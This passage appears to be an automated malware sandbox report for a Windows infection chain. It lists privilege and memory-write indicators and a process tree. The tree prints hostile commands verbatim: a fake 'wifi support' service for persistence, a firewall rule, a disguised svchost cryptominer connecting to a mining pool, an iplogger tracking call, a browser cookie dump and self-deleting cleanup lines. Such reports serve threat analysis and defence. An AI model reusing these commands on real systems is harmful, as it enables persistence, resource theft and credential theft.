2472	MicrosoftEdgeCP.exe
2708	seed.exe
4996	17FF.exe
956	3733.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

msiexec.exemsiexec.exe

description	pid	process
Token: SeShutdownPrivilege	3820	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3820	msiexec.exe
Token: SeSecurityPrivilege	2600	msiexec.exe
Token: SeCreateTokenPrivilege	3820	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3820	msiexec.exe
Token: SeLockMemoryPrivilege	3820	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3820	msiexec.exe
Token: SeMachineAccountPrivilege	3820	msiexec.exe
Token: SeTcbPrivilege	3820	msiexec.exe
Token: SeSecurityPrivilege	3820	msiexec.exe
Token: SeTakeOwnershipPrivilege	3820	msiexec.exe
Token: SeLoadDriverPrivilege	3820	msiexec.exe
Token: SeSystemProfilePrivilege	3820	msiexec.exe
Token: SeSystemtimePrivilege	3820	msiexec.exe
Token: SeProfSingleProcessPrivilege	3820	msiexec.exe
Token: SeIncBasePriorityPrivilege	3820	msiexec.exe
Token: SeCreatePagefilePrivilege	3820	msiexec.exe
Token: SeCreatePermanentPrivilege	3820	msiexec.exe
Token: SeBackupPrivilege	3820	msiexec.exe
Token: SeRestorePrivilege	3820	msiexec.exe
Token: SeShutdownPrivilege	3820	msiexec.exe
Token: SeDebugPrivilege	3820	msiexec.exe
Token: SeAuditPrivilege	3820	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3820	msiexec.exe
Token: SeChangeNotifyPrivilege	3820	msiexec.exe
Token: SeRemoteShutdownPrivilege	3820	msiexec.exe
Token: SeUndockPrivilege	3820	msiexec.exe
Token: SeSyncAgentPrivilege	3820	msiexec.exe
Token: SeEnableDelegationPrivilege	3820	msiexec.exe
Token: SeManageVolumePrivilege	3820	msiexec.exe
Token: SeImpersonatePrivilege	3820	msiexec.exe
Token: SeCreateGlobalPrivilege	3820	msiexec.exe
Token: SeCreateTokenPrivilege	3820	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3820	msiexec.exe
Token: SeLockMemoryPrivilege	3820	msiexec.exe
Token: SeIncreaseQuotaPrivilege	3820	msiexec.exe
Token: SeMachineAccountPrivilege	3820	msiexec.exe
Token: SeTcbPrivilege	3820	msiexec.exe
Token: SeSecurityPrivilege	3820	msiexec.exe
Token: SeTakeOwnershipPrivilege	3820	msiexec.exe
Token: SeLoadDriverPrivilege	3820	msiexec.exe
Token: SeSystemProfilePrivilege	3820	msiexec.exe
Token: SeSystemtimePrivilege	3820	msiexec.exe
Token: SeProfSingleProcessPrivilege	3820	msiexec.exe
Token: SeIncBasePriorityPrivilege	3820	msiexec.exe
Token: SeCreatePagefilePrivilege	3820	msiexec.exe
Token: SeCreatePermanentPrivilege	3820	msiexec.exe
Token: SeBackupPrivilege	3820	msiexec.exe
Token: SeRestorePrivilege	3820	msiexec.exe
Token: SeShutdownPrivilege	3820	msiexec.exe
Token: SeDebugPrivilege	3820	msiexec.exe
Token: SeAuditPrivilege	3820	msiexec.exe
Token: SeSystemEnvironmentPrivilege	3820	msiexec.exe
Token: SeChangeNotifyPrivilege	3820	msiexec.exe
Token: SeRemoteShutdownPrivilege	3820	msiexec.exe
Token: SeUndockPrivilege	3820	msiexec.exe
Token: SeSyncAgentPrivilege	3820	msiexec.exe
Token: SeEnableDelegationPrivilege	3820	msiexec.exe
Token: SeManageVolumePrivilege	3820	msiexec.exe
Token: SeImpersonatePrivilege	3820	msiexec.exe
Token: SeCreateGlobalPrivilege	3820	msiexec.exe
Token: SeCreateTokenPrivilege	3820	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	3820	msiexec.exe
Token: SeLockMemoryPrivilege	3820	msiexec.exe

Suspicious use of FindShellTrayWindow 3 IoCs

Processes:

msiexec.exe23E04C4F32EF2158.tmpprolab.tmp

pid process

3820 msiexec.exe
2140 23E04C4F32EF2158.tmp
3616 prolab.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exe

pid process

3664 MicrosoftEdge.exe
2472 MicrosoftEdgeCP.exe
2472 MicrosoftEdgeCP.exe

pid	process
3820	msiexec.exe
2140	23E04C4F32EF2158.tmp
3616	prolab.tmp

pid	process
3664	MicrosoftEdge.exe
2472	MicrosoftEdgeCP.exe
2472	MicrosoftEdgeCP.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Setup.exemsiexec.execmd.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.execmd.execmd.exe

description	pid	process	target process
PID 3996 wrote to memory of 3820	3996	Setup.exe	msiexec.exe
PID 3996 wrote to memory of 3820	3996	Setup.exe	msiexec.exe
PID 3996 wrote to memory of 3820	3996	Setup.exe	msiexec.exe
PID 2600 wrote to memory of 2300	2600	msiexec.exe	MsiExec.exe
PID 2600 wrote to memory of 2300	2600	msiexec.exe	MsiExec.exe
PID 2600 wrote to memory of 2300	2600	msiexec.exe	MsiExec.exe
PID 3996 wrote to memory of 1592	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 1592	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 1592	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 2112	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 2112	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 2112	3996	Setup.exe	C0CA61A12E4C8B38.exe
PID 3996 wrote to memory of 752	3996	Setup.exe	cmd.exe
PID 3996 wrote to memory of 752	3996	Setup.exe	cmd.exe
PID 3996 wrote to memory of 752	3996	Setup.exe	cmd.exe
PID 752 wrote to memory of 3192	752	cmd.exe	PING.EXE
PID 752 wrote to memory of 3192	752	cmd.exe	PING.EXE
PID 752 wrote to memory of 3192	752	cmd.exe	PING.EXE
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3396	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 2112 wrote to memory of 1780	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 2112 wrote to memory of 1780	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 2112 wrote to memory of 1780	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 1780 wrote to memory of 2772	1780	cmd.exe	taskkill.exe
PID 1780 wrote to memory of 2772	1780	cmd.exe	taskkill.exe
PID 1780 wrote to memory of 2772	1780	cmd.exe	taskkill.exe
PID 1592 wrote to memory of 3384	1592	C0CA61A12E4C8B38.exe	1615018414768.exe
PID 1592 wrote to memory of 3384	1592	C0CA61A12E4C8B38.exe	1615018414768.exe
PID 1592 wrote to memory of 3384	1592	C0CA61A12E4C8B38.exe	1615018414768.exe
PID 2112 wrote to memory of 648	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 2112 wrote to memory of 648	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 2112 wrote to memory of 648	2112	C0CA61A12E4C8B38.exe	cmd.exe
PID 648 wrote to memory of 2392	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 2392	648	cmd.exe	PING.EXE
PID 648 wrote to memory of 2392	648	cmd.exe	PING.EXE
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2596	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 3884	1592	C0CA61A12E4C8B38.exe	1615018419737.exe
PID 1592 wrote to memory of 3884	1592	C0CA61A12E4C8B38.exe	1615018419737.exe
PID 1592 wrote to memory of 3884	1592	C0CA61A12E4C8B38.exe	1615018419737.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2496	1592	C0CA61A12E4C8B38.exe	firefox.exe
PID 1592 wrote to memory of 2028	1592	C0CA61A12E4C8B38.exe	1615018425096.exe
PID 1592 wrote to memory of 2028	1592	C0CA61A12E4C8B38.exe	1615018425096.exe
PID 1592 wrote to memory of 2028	1592	C0CA61A12E4C8B38.exe	1615018425096.exe
PID 1592 wrote to memory of 2168	1592	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 1592 wrote to memory of 2168	1592	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 1592 wrote to memory of 2168	1592	C0CA61A12E4C8B38.exe	ThunderFW.exe
PID 1592 wrote to memory of 2416	1592	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 1592 wrote to memory of 2416	1592	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 1592 wrote to memory of 2416	1592	C0CA61A12E4C8B38.exe	MiniThunderPlatform.exe
PID 1592 wrote to memory of 2296	1592	C0CA61A12E4C8B38.exe	23E04C4F32EF2158.exe

C:\Users\Admin\AppData\Local\Temp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Setup.exe"
1⤵
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3996

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
2⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3820

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:1592

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:3396

C:\Users\Admin\AppData\Roaming\1615018414768.exe
"C:\Users\Admin\AppData\Roaming\1615018414768.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018414768.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3384

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2596

C:\Users\Admin\AppData\Roaming\1615018419737.exe
"C:\Users\Admin\AppData\Roaming\1615018419737.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018419737.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3884

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
3⤵
PID:2496

C:\Users\Admin\AppData\Roaming\1615018425096.exe
"C:\Users\Admin\AppData\Roaming\1615018425096.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615018425096.txt"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2028

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
3⤵
- Executes dropped EXE
PID:2168

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
PID:2416

C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent
3⤵
- Executes dropped EXE
PID:2296

C:\Users\Admin\AppData\Local\Temp\is-F0LFM.tmp\23E04C4F32EF2158.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F0LFM.tmp\23E04C4F32EF2158.tmp" /SL5="$601CA,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent
4⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2140

C:\Program Files (x86)\DTS\seed.sfx.exe
"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s1
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4004

C:\Program Files (x86)\Seed Trade\Seed\seed.exe
"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2708

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "start https://iplogger.org/14Zhe7"
5⤵
- Checks computer location settings
PID:1252

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
PID:2904

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:1852

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:2772

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:2392

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
3⤵
- Runs ping.exe
PID:3192

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2600

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding FC13F1CFC6A01F195462F48BA3316637 C
2⤵
- Loads dropped DLL
PID:2300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3664

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1880

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2472

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:4080

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4384

C:\Users\Admin\AppData\Local\Temp\EA81.exe
C:\Users\Admin\AppData\Local\Temp\EA81.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4480

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\4c8c8c43-19ca-469f-a92f-e9d42db7d04a" /deny *S-1-1-0:(OI)(CI)(DE,DC)
2⤵
- Modifies file permissions
PID:4572

C:\Users\Admin\AppData\Local\Temp\EA81.exe
"C:\Users\Admin\AppData\Local\Temp\EA81.exe" --Admin IsNotAutoStart IsNotTask
2⤵
- Executes dropped EXE
PID:4604

C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin1.exe
"C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin1.exe"
3⤵
- Executes dropped EXE
PID:4900

C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin2.exe
"C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin2.exe"
3⤵
- Executes dropped EXE
PID:4952

C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe
"C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe"
3⤵
- Executes dropped EXE
PID:4984

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\updatewin.exe
4⤵
PID:4908

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
5⤵
- Delays execution with timeout.exe
PID:4016

C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe
"C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\5176953a-cb8c-4cf3-af42-75814964c645\5.exe" & del C:\ProgramData\*.dll & exit
4⤵
PID:5000

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5.exe /f
5⤵
- Kills process with taskkill
PID:2308

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
5⤵
- Delays execution with timeout.exe
PID:3336

C:\Users\Admin\AppData\Local\Temp\F782.exe
C:\Users\Admin\AppData\Local\Temp\F782.exe
1⤵
- Executes dropped EXE
PID:4628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo MFbR
2⤵
PID:4692

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Declinante.html
2⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
cmd
3⤵
PID:4800

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^vbzKnQFSqnlAJtUxNfEmiqqLJfcsIqUhKbnAvosGDfELCESlYcgqhNQcvIqpchlqDWPjFzXEXXVRvfoyblzjLTqXHrtOiokftEiFOGFFnJrfSYZuAVMkUYgKWSECgobOMFMRoCdQFOOwQKtJrX$" Quel.cab
4⤵
PID:6232

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
Sui.com Benedetto.txt
4⤵
PID:7376

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
5⤵
PID:6248

C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com
C:\Users\Admin\AppData\Local\Temp\HbupnlUNxCFbW\Sui.com Benedetto.txt
6⤵
PID:7768

C:\Users\Admin\AppData\Local\Temp\196.exe
C:\Users\Admin\AppData\Local\Temp\196.exe
1⤵
- Executes dropped EXE
PID:4932

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4240

C:\Users\Admin\AppData\Local\Temp\659.exe
C:\Users\Admin\AppData\Local\Temp\659.exe
1⤵
- Executes dropped EXE
PID:4208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\eijeimm\
2⤵
PID:4708

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vuikyvwo.exe" C:\Windows\SysWOW64\eijeimm\
2⤵
PID:4788

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create eijeimm binPath= "C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe /d\"C:\Users\Admin\AppData\Local\Temp\659.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:4916

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description eijeimm "wifi internet conection"
2⤵
PID:2060

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start eijeimm
2⤵
PID:1824

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:4196

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3824

C:\Users\Admin\AppData\Local\Temp\1668.exe
C:\Users\Admin\AppData\Local\Temp\1668.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1716

C:\Users\Admin\AppData\Local\Temp\17FF.exe
C:\Users\Admin\AppData\Local\Temp\17FF.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5060

C:\Users\Admin\AppData\Local\Temp\17FF.exe
C:\Users\Admin\AppData\Local\Temp\17FF.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4996

C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe
C:\Windows\SysWOW64\eijeimm\vuikyvwo.exe /d"C:\Users\Admin\AppData\Local\Temp\659.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3200

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3500

C:\Windows\SysWOW64\svchost.exe
svchost.exe -o msr.pool-pay.com:6199 -u 9jNvTpsSutBLodbiiRngN2S4AfM84WJ4Y8zRpo6H4QPBK625huByLqkiCTh5Uog1qHVBr7cyZfbA1GiiPqSsSv83HAiirSf.50000 -p x -k
3⤵
PID:8

C:\Users\Admin\AppData\Local\Temp\201E.exe
C:\Users\Admin\AppData\Local\Temp\201E.exe
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4808

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:2412

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
2⤵
- Executes dropped EXE
PID:4880

C:\Users\Admin\AppData\Local\Temp\2C35.exe
C:\Users\Admin\AppData\Local\Temp\2C35.exe
1⤵
- Executes dropped EXE
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 360
2⤵
- Program crash
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 336
2⤵
- Program crash
PID:5072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 368
2⤵
- Program crash
PID:3156

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 648
2⤵
- Program crash
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 660
2⤵
- Program crash
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 716
2⤵
- Program crash
PID:1268

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 676
2⤵
- Program crash
PID:348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 752
2⤵
- Program crash
PID:2004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 712
2⤵
- Program crash
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 732
2⤵
- Program crash
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 804
2⤵
- Program crash
PID:4796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 768
2⤵
- Program crash
PID:1348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 664
2⤵
- Program crash
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 732
2⤵
- Program crash
PID:5032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 772
2⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 616
2⤵
- Program crash
PID:4184

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 692
2⤵
- Program crash
PID:4092

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 600
2⤵
- Program crash
PID:2832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3832 -s 772
2⤵
- Program crash
PID:4664

C:\Users\Admin\AppData\Local\Temp\2C35.exe
"C:\Users\Admin\AppData\Local\Temp\2C35.exe"
2⤵
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:1836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 332
3⤵
- Program crash
PID:2984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 320
3⤵
- Program crash
PID:5008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 312
3⤵
- Program crash
PID:4584

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 596
3⤵
- Program crash
PID:4052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 632
3⤵
- Program crash
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 668
3⤵
- Program crash
PID:2360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 700
3⤵
- Program crash
PID:2828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1836 -s 684
3⤵
- Program crash
PID:4368

C:\Windows\SysWOW64\WerFault.exe
